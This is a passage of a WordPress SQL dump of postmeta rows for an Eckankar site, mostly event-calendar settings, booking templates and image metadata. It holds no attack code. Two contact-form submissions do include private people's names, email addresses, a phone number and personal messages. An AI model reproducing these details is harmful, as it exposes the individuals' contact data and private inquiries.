at_occurrences',''),(156845,266411,'mec_repeat_end_at_date',''),(156846,266411,'mec_advanced_days','a:0:{}'),(156847,266411,'mec_in_days',''),(156848,266411,'mec_not_in_days',''),(156849,266411,'mec_hourly_schedules','a:0:{}'),(156850,266411,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(156851,266411,'mec_tickets','a:0:{}'),(156852,266411,'mec_fees_global_inheritance','1'),(156853,266411,'mec_fees','a:0:{}'),(156854,266411,'mec_ticket_variations_global_inheritance','1'),(156855,266411,'mec_ticket_variations','a:0:{}'),(156856,266411,'mec_reg_fields_global_inheritance','1'),(156857,266411,'mec_reg_fields','a:0:{}'),(156858,266411,'mec_bfixed_fields','a:0:{}'),(156859,266411,'mec_op','a:0:{}'),(156860,266411,'mec_fields','a:0:{}'),(156861,266411,'mec_event_status','EventScheduled'),(156862,266411,'mec_moved_online_link',''),(156863,266411,'mec_cancelled_reason',''),(156864,266411,'mec_display_cancellation_reason_in_single_page',''),(156865,266411,'boldgrid_hide_page_title','0'),(156866,266411,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(156867,266411,'passster_activate_global_protection',NULL),(156868,266411,'passster_activate_protection',NULL),(156869,266411,'passster_protection_type','password'),(156872,266411,'_dp_original','266407'),(156871,266411,'_thumbnail_id','266412'),(156873,266411,'_edit_lock','1648178601:2'),(156874,266412,'_wp_attached_file','2022/03/group-smiling-1.jpg'),(156875,266412,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:699;s:6:\"height\";i:393;s:4:\"file\";s:27:\"2022/03/group-smiling-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"group-smiling-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"group-smiling-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:27:\"group-smiling-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:27:\"group-smiling-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:27:\"group-smiling-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:27:\"group-smiling-1-300x393.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:393;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(156876,266411,'_edit_last','2'),(156877,266412,'original-file','2022/03/group-smiling-1-updraft-pre-smush-original.jpg'),(156878,266412,'smush-complete','1'),(156879,266412,'smush-info','The file was compressed from 66.92 KB to 64.14 KB saving 4.16 percent using WP-Optimize'),(156880,266412,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:68529;s:12:\"smushed-size\";i:65681;s:15:\"savings-percent\";d:4.160000000000000142108547152020037174224853515625;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:68529;s:10:\"compressed\";i:65681;}s:6:\"medium\";a:2:{s:8:\"original\";i:16636;s:10:\"compressed\";i:16293;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8944;s:10:\"compressed\";i:8878;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:25455;s:10:\"compressed\";i:24902;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:38671;s:10:\"compressed\";i:37807;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:28337;s:10:\"compressed\";i:27697;}s:8:\"tileview\";a:2:{s:8:\"original\";i:30281;s:10:\"compressed\";i:29681;}}}'),(156881,266414,'protect_children',''),(156882,266414,'mec_color',''),(156883,266414,'mec_location_id','118'),(156884,266414,'mec_dont_show_map','0'),(156885,266414,'mec_organizer_id','1'),(156886,266414,'mec_read_more',''),(156887,266414,'mec_more_info',''),(156888,266414,'mec_more_info_title',''),(156889,266414,'mec_more_info_target','_self'),(156890,266414,'mec_cost',''),(156891,266414,'mec_currency','a:0:{}'),(156892,266414,'mec_additional_organizer_ids','a:0:{}'),(156893,266414,'mec_additional_location_ids','a:0:{}'),(156894,266414,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-06-01\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-06-01\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(156895,266414,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(156896,266414,'mec_certain_weekdays','a:0:{}'),(156897,266414,'mec_allday','0'),(156898,266414,'one_occurrence','0'),(156899,266414,'mec_hide_time','0'),(156900,266414,'mec_hide_end_time','0'),(156901,266414,'mec_comment',''),(156902,266414,'mec_timezone','global'),(156903,266414,'mec_countdown_method','global'),(156904,266414,'mec_public','1'),(156905,266414,'mec_start_date','2022-06-01'),(156906,266414,'mec_start_time_hour','7'),(156907,266414,'mec_start_time_minutes','0'),(156908,266414,'mec_start_time_ampm','PM'),(156909,266414,'mec_start_day_seconds','68400'),(156910,266414,'mec_end_date','2022-06-01'),(156911,266414,'mec_end_time_hour','8'),(156912,266414,'mec_end_time_minutes','0'),(156913,266414,'mec_end_time_ampm','PM'),(156914,266414,'mec_end_day_seconds','72000'),(156915,266414,'mec_repeat_status','0'),(156916,266414,'mec_repeat_type',''),(156917,266414,'mec_repeat_interval','1'),(156918,266414,'mec_repeat_end',''),(156919,266414,'mec_repeat_end_at_occurrences',''),(156920,266414,'mec_repeat_end_at_date',''),(156921,266414,'mec_advanced_days','a:0:{}'),(156922,266414,'mec_in_days',''),(156923,266414,'mec_not_in_days',''),(156924,266414,'mec_hourly_schedules','a:0:{}'),(156925,266414,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(156926,266414,'mec_tickets','a:0:{}'),(156927,266414,'mec_fees_global_inheritance','1'),(156928,266414,'mec_fees','a:0:{}'),(156929,266414,'mec_ticket_variations_global_inheritance','1'),(156930,266414,'mec_ticket_variations','a:0:{}'),(156931,266414,'mec_reg_fields_global_inheritance','1'),(156932,266414,'mec_reg_fields','a:0:{}'),(156933,266414,'mec_bfixed_fields','a:0:{}'),(156934,266414,'mec_op','a:0:{}'),(156935,266414,'mec_fields','a:0:{}'),(156936,266414,'mec_event_status','EventScheduled'),(156937,266414,'mec_moved_online_link',''),(156938,266414,'mec_cancelled_reason',''),(156939,266414,'mec_display_cancellation_reason_in_single_page',''),(156940,266414,'boldgrid_hide_page_title','0'),(156941,266414,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(156942,266414,'passster_activate_global_protection',NULL),(156943,266414,'passster_activate_protection',NULL),(156944,266414,'passster_protection_type','password'),(156945,266414,'_thumbnail_id','266412'),(156947,266414,'_dp_original','266411'),(156948,266414,'_edit_lock','1648178790:2'),(156949,266414,'_edit_last','2'),(156950,266416,'protect_children',''),(156951,266416,'mec_color',''),(156952,266416,'mec_location_id','118'),(156953,266416,'mec_dont_show_map','0'),(156954,266416,'mec_organizer_id','1'),(156955,266416,'mec_read_more',''),(156956,266416,'mec_more_info',''),(156957,266416,'mec_more_info_title',''),(156958,266416,'mec_more_info_target','_self'),(156959,266416,'mec_cost',''),(156960,266416,'mec_currency','a:0:{}'),(156961,266416,'mec_additional_organizer_ids','a:0:{}'),(156962,266416,'mec_additional_location_ids','a:0:{}'),(156963,266416,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-19\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-19\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(156964,266416,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(156965,266416,'mec_certain_weekdays','a:0:{}'),(156966,266416,'mec_allday','0'),(156967,266416,'one_occurrence','0'),(156968,266416,'mec_hide_time','0'),(156969,266416,'mec_hide_end_time','0'),(156970,266416,'mec_comment',''),(156971,266416,'mec_timezone','global'),(156972,266416,'mec_countdown_method','global'),(156973,266416,'mec_public','1'),(156974,266416,'mec_start_date','2022-04-19'),(156975,266416,'mec_start_time_hour','7'),(156976,266416,'mec_start_time_minutes','0'),(156977,266416,'mec_start_time_ampm','AM'),(156978,266416,'mec_start_day_seconds','25200'),(156979,266416,'mec_end_date','2022-04-19'),(156980,266416,'mec_end_time_hour','8'),(156981,266416,'mec_end_time_minutes','0'),(156982,266416,'mec_end_time_ampm','PM'),(156983,266416,'mec_end_day_seconds','72000'),(156984,266416,'mec_repeat_status','0'),(156985,266416,'mec_repeat_type',''),(156986,266416,'mec_repeat_interval','1'),(156987,266416,'mec_repeat_end',''),(156988,266416,'mec_repeat_end_at_occurrences',''),(156989,266416,'mec_repeat_end_at_date',''),(156990,266416,'mec_advanced_days','a:0:{}'),(156991,266416,'mec_in_days',''),(156992,266416,'mec_not_in_days',''),(156993,266416,'mec_hourly_schedules','a:0:{}'),(156994,266416,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(156995,266416,'mec_tickets','a:0:{}'),(156996,266416,'mec_fees_global_inheritance','1'),(156997,266416,'mec_fees','a:0:{}'),(156998,266416,'mec_ticket_variations_global_inheritance','1'),(156999,266416,'mec_ticket_variations','a:0:{}'),(157000,266416,'mec_reg_fields_global_inheritance','1'),(157001,266416,'mec_reg_fields','a:0:{}'),(157002,266416,'mec_bfixed_fields','a:0:{}'),(157003,266416,'mec_op','a:0:{}'),(157004,266416,'mec_fields','a:0:{}'),(157005,266416,'mec_event_status','EventScheduled'),(157006,266416,'mec_moved_online_link',''),(157007,266416,'mec_cancelled_reason',''),(157008,266416,'mec_display_cancellation_reason_in_single_page',''),(157009,266416,'boldgrid_hide_page_title','0'),(157010,266416,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(157011,266416,'passster_activate_global_protection',NULL),(157012,266416,'passster_activate_protection',NULL),(157013,266416,'passster_protection_type','password'),(157015,266416,'_dp_original','266104'),(157016,266416,'_edit_lock','1648314221:2'),(157017,266416,'_edit_last','2'),(157018,266417,'_wp_attached_file','2022/03/happy-jump-2.jpg'),(157019,266417,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:711;s:6:\"height\";i:400;s:4:\"file\";s:24:\"2022/03/happy-jump-2.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"happy-jump-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"happy-jump-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:24:\"happy-jump-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:24:\"happy-jump-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:24:\"happy-jump-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:24:\"happy-jump-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(157020,266416,'_thumbnail_id','266417'),(157021,266417,'original-file','2022/03/happy-jump-2-updraft-pre-smush-original.jpg'),(157022,266417,'smush-complete','1'),(157023,266417,'smush-info','The file was compressed from 79.76 KB to 76.60 KB saving 3.97 percent using WP-Optimize'),(157024,266417,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:81677;s:12:\"smushed-size\";i:78435;s:15:\"savings-percent\";d:3.970000000000000195399252334027551114559173583984375;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:81677;s:10:\"compressed\";i:78435;}s:6:\"medium\";a:2:{s:8:\"original\";i:17931;s:10:\"compressed\";i:17566;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8690;s:10:\"compressed\";i:8624;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:25787;s:10:\"compressed\";i:25367;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:40964;s:10:\"compressed\";i:40165;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:29947;s:10:\"compressed\";i:29397;}s:8:\"tileview\";a:2:{s:8:\"original\";i:32658;s:10:\"compressed\";i:32063;}}}'),(157025,266419,'_field_133','Faris'),(157026,266419,'_field_134','A'),(157027,266419,'_field_135','farisreiki@yahoo.com'),(157028,266419,'_field_137','Question about Eckankar'),(157029,266419,'_field_138','Hi,\n\nI am new to Eckankar, and I\'d like to know if:\n\n1- I can start my journey with the online \"Advanced Spiritual Living Courses\"?\n\n2- Does this course also teach healing methods, for me to be able to heal other people?\n\nThank you'),(157030,266419,'_form_id','13'),(157031,266419,'_seq_num','102'),(161145,266633,'mec_start_time_ampm','PM'),(161144,266633,'mec_start_time_minutes','0'),(161143,266633,'mec_start_time_hour','7'),(161142,266633,'mec_start_date','2022-05-13'),(161141,266633,'mec_public','1'),(161140,266633,'mec_countdown_method','global'),(161139,266633,'mec_timezone','global'),(161138,266633,'mec_comment',''),(161137,266633,'mec_hide_end_time','0'),(161136,266633,'mec_hide_time','0'),(161135,266633,'one_occurrence','0'),(161134,266633,'mec_allday','0'),(161133,266633,'mec_certain_weekdays','a:0:{}'),(161132,266633,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(161646,266676,'mec_more_info_title',''),(161162,266633,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(161161,266633,'mec_hourly_schedules','a:0:{}'),(161160,266633,'mec_not_in_days',''),(161159,266633,'mec_in_days',''),(161158,266633,'mec_advanced_days','a:0:{}'),(161157,266633,'mec_repeat_end_at_date',''),(161156,266633,'mec_repeat_end_at_occurrences',''),(161155,266633,'mec_repeat_end',''),(161154,266633,'mec_repeat_interval','1'),(161151,266633,'mec_end_day_seconds','72000'),(161152,266633,'mec_repeat_status','0'),(161153,266633,'mec_repeat_type',''),(161150,266633,'mec_end_time_ampm','PM'),(161149,266633,'mec_end_time_minutes','0'),(161148,266633,'mec_end_time_hour','8'),(161122,266633,'mec_organizer_id','1'),(161121,266633,'mec_dont_show_map','0'),(161119,266633,'mec_color',''),(161120,266633,'mec_location_id','118'),(161118,266633,'protect_children',''),(161117,266632,'_seq_num','48'),(161116,266632,'_form_id','35'),(161115,266632,'_field_316','A friend many years ago were members of your church in Colorado Springs. I saw your commercial which brought back the memory. \nI would like to learn more. Is there any cost, if so how much?  I am on Social Security. \nThank you\nPS. Please text first as I do not answer numbers I don’t know. '),(161114,266632,'_field_315','Learn'),(161113,266632,'_field_314','leilaniroe@msn.com'),(161110,266632,'_field_312','Leilani'),(161111,266632,'_field_313','Roe-Miller'),(161112,266632,'_field_333','7193342285'),(161109,266631,'_seq_num','8'),(161108,266631,'_form_id','56'),(157343,266432,'mec_color',''),(157344,266432,'mec_location_id','129'),(157345,266432,'mec_dont_show_map','0'),(157346,266432,'mec_organizer_id','0'),(157347,266432,'mec_read_more',''),(157348,266432,'mec_more_info',''),(157349,266432,'mec_more_info_title',''),(157350,266432,'mec_more_info_target','_self'),(157351,266432,'mec_cost',''),(157352,266432,'mec_currency','a:0:{}'),(157353,266432,'mec_additional_organizer_ids','a:0:{}'),(157354,266432,'mec_additional_location_ids','a:0:{}'),(157355,266432,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-30\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-30\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(157356,266432,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(157357,266432,'mec_certain_weekdays','a:0:{}'),(157358,266432,'mec_allday','0'),(157359,266432,'one_occurrence','0'),(157360,266432,'mec_hide_time','0'),(157361,266432,'mec_hide_end_time','0'),(157362,266432,'mec_comment',''),(157363,266432,'mec_timezone','global'),(157364,266432,'mec_countdown_method','global'),(157365,266432,'mec_public','1'),(157366,266432,'mec_start_date','2022-04-30'),(157367,266432,'mec_start_time_hour','10'),(157368,266432,'mec_start_time_minutes','30'),(157369,266432,'mec_start_time_ampm','AM'),(157370,266432,'mec_start_day_seconds','37800'),(157371,266432,'mec_end_date','2022-04-30'),(157372,266432,'mec_end_time_hour','11'),(157373,266432,'mec_end_time_minutes','30'),(157374,266432,'mec_end_time_ampm','PM'),(157375,266432,'mec_end_day_seconds','84600'),(157376,266432,'mec_repeat_status','0'),(157377,266432,'mec_repeat_type',''),(157378,266432,'mec_repeat_interval','1'),(157379,266432,'mec_repeat_end',''),(157380,266432,'mec_repeat_end_at_occurrences',''),(157381,266432,'mec_repeat_end_at_date',''),(157382,266432,'mec_advanced_days','a:0:{}'),(157383,266432,'mec_in_days',''),(157384,266432,'mec_not_in_days',''),(157385,266432,'mec_hourly_schedules','a:0:{}'),(157386,266432,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(157387,266432,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:25:\"ECK Light & Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register 